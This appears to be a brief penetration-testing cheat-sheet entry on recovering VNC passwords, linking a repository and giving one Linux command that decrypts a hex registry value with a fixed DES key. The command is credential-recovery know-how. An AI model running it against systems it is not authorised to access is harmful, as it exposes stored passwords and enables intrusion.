VNC Decrypt Password

https://github.com/frizb/PasswordDecrypts

#Linux command to decrypt VNC Hex registry where d7a514d8c556aade = hex

echo -n d7a514d8c556aade | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Last updated